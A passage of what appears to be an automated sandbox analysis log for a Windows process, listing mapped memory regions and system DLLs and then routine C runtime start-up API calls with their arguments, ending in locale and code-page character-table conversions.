"pagefile_0x0000000002830000" filename = "" Region: id = 2523 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2524 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2525 start_va = 0x24c0000 end_va = 0x24c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 2526 start_va = 0x29c0000 end_va = 0x2b40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029c0000" filename = "" Region: id = 2527 start_va = 0x2b50000 end_va = 0x3f4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b50000" filename = "" Region: id = 2528 start_va = 0x3f50000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f50000" filename = "" Region: id = 2581 start_va = 0x40d0000 end_va = 0x48cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000040d0000" filename = "" Region: id = 2582 start_va = 0x24d0000 end_va = 0x24d2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024d0000" filename = "" Region: id = 2583 start_va = 0x24d0000 end_va = 0x24d2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024d0000" filename = "" Region: id = 2584 start_va = 0x24d0000 end_va = 0x24d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 2585 start_va = 0x73dd0000 end_va = 0x73e44fff monitored = 0 entry_point = 0x73e09a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2586 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2587 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2588 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2589 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2590 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2591 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2592 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2593 start_va = 0x40d0000 end_va = 0x425ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 2598 start_va = 0x24e0000 end_va = 0x250ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 2600 start_va = 0x764e0000 end_va = 0x765fefff monitored = 0 entry_point = 0x76525980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2601 start_va = 0x24e0000 end_va = 0x24e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024e0000" filename = "" Region: id = 2602 start_va = 0x2500000 end_va = 0x250ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 2603 start_va = 0x3f50000 end_va = 0x400bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f50000" filename = "" Region: id = 2604 start_va = 0x40c0000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 2605 start_va = 0x24e0000 end_va = 0x24e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024e0000" filename = "" Region: id = 2606 start_va = 0x73db0000 end_va = 0x73dccfff monitored = 0 entry_point = 0x73db3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2623 start_va = 0x24f0000 end_va = 0x24f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 2835 start_va = 0x24f0000 end_va = 0x24f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Thread: id = 161 os_tid = 0xd28 [0147.507] GetStartupInfoW (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0147.508] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0147.508] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x40c0000 [0147.509] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0147.509] GetProcAddress (hModule=0x76720000, lpProcName="FlsAlloc") returned 0x7673a980 [0147.509] GetProcAddress (hModule=0x76720000, lpProcName="FlsGetValue") returned 0x76737570 [0147.510] GetProcAddress (hModule=0x76720000, lpProcName="FlsSetValue") returned 0x76739e30 [0147.510] GetProcAddress (hModule=0x76720000, lpProcName="FlsFree") returned 0x76744ff0 [0147.728] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x214) returned 0x40c05a8 [0147.728] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76720000 [0147.728] GetCurrentThreadId () returned 0xd28 [0147.728] GetStartupInfoW (in: lpStartupInfo=0x19feb4 | out: lpStartupInfo=0x19feb4*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x419e1d, hStdOutput=0x41a156, hStdError=0x40c05a8)) [0147.728] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x800) returned 0x40c07c8 [0147.728] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0147.728] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0147.728] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0147.728] SetHandleCount (uNumber=0x20) returned 0x20 [0147.729] GetCommandLineW () returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" [0147.729] GetEnvironmentStringsW () returned 0x2740ce0* [0147.729] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x0, Size=0xa16) returned 0x40c0fd0 [0147.729] FreeEnvironmentStringsW (penv=0x2740ce0) returned 1 [0147.730] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24a89a0, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih")) returned 0x2d [0147.730] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x0, Size=0x64) returned 0x40c19f0 [0147.730] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x90) returned 0x40c1a60 [0147.730] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x3e) returned 0x40c1af8 [0147.730] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x5c) returned 0x40c1b40 [0147.730] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x6e) returned 0x40c1ba8 [0147.730] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x78) returned 0x40c1c20 [0147.730] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x62) returned 0x40c1ca0 [0147.730] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x28) returned 0x40c1d10 [0147.730] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x48) returned 0x40c1d40 [0147.733] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x1a) returned 0x40c1d90 [0147.733] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x3a) returned 0x40c1db8 [0147.733] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x62) returned 0x40c1e00 [0147.733] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x2a) returned 0x40c1e70 [0147.733] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x2e) returned 0x40c1ea8 [0147.733] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x1c) returned 0x40c1ee0 [0147.733] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0xd2) returned 0x40c1f08 [0147.733] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x7c) returned 0x40c1fe8 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x36) returned 0x40c2070 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x3a) returned 0x40c20b0 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x90) returned 0x40c20f8 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x24) returned 0x40c2190 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x30) returned 0x40c21c0 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x36) returned 0x40c21f8 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x48) returned 0x40c2238 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x52) returned 0x40c2288 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x3c) returned 0x40c22e8 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0xd2) returned 0x40c2330 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x2e) returned 0x40c2410 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x1e) returned 0x40c2448 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x2c) returned 0x40c2470 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x54) returned 0x40c24a8 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x52) returned 0x40c2508 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x24) returned 0x40c2568 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x42) returned 0x40c2598 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x2c) returned 0x40c25e8 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x44) returned 0x40c2620 [0147.734] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x24) returned 0x40c2670 [0147.743] HeapFree (in: hHeap=0x40c0000, dwFlags=0x0, lpMem=0x40c0fd0 | out: hHeap=0x40c0000) returned 1 [0147.743] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0147.743] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x800) returned 0x40c26a0 [0147.743] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x8, Size=0x80) returned 0x40c2ea8 [0147.743] GetLastError () returned 0x0 [0147.744] SetLastError (dwErrCode=0x0) [0147.744] GetLastError () returned 0x0 [0147.744] SetLastError (dwErrCode=0x0) [0147.744] GetLastError () returned 0x0 [0147.744] SetLastError (dwErrCode=0x0) [0147.744] GetACP () returned 0x4e4 [0147.744] RtlAllocateHeap (HeapHandle=0x40c0000, Flags=0x0, Size=0x220) returned 0x40c0fd0 [0147.744] GetLastError () returned 0x0 [0147.744] SetLastError (dwErrCode=0x0) [0147.744] IsValidCodePage (CodePage=0x4e4) returned 1 [0147.744] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe7c | out: lpCPInfo=0x19fe7c) returned 1 [0147.744] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f948 | out: lpCPInfo=0x19f948) returned 1 [0147.744] GetLastError () returned 0x0 [0147.744] SetLastError (dwErrCode=0x0) [0147.744] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0147.744] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿAĀ") returned 256 [0147.744] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿAĀ", cchSrc=256, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0147.745] GetLastError () returned 0x0 [0147.745] SetLastError (dwErrCode=0x0) [0147.745] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0147.745] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0147.745] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0147.746] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0147.746] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x19fc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿõ\x05~Ð\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0147.753] GetLastError () returned 0x0 [0147.753] SetLastError (dwErrCode=0x0) [0147.753] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0147.753] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0147.753] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0147.753] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0147.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x19fb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 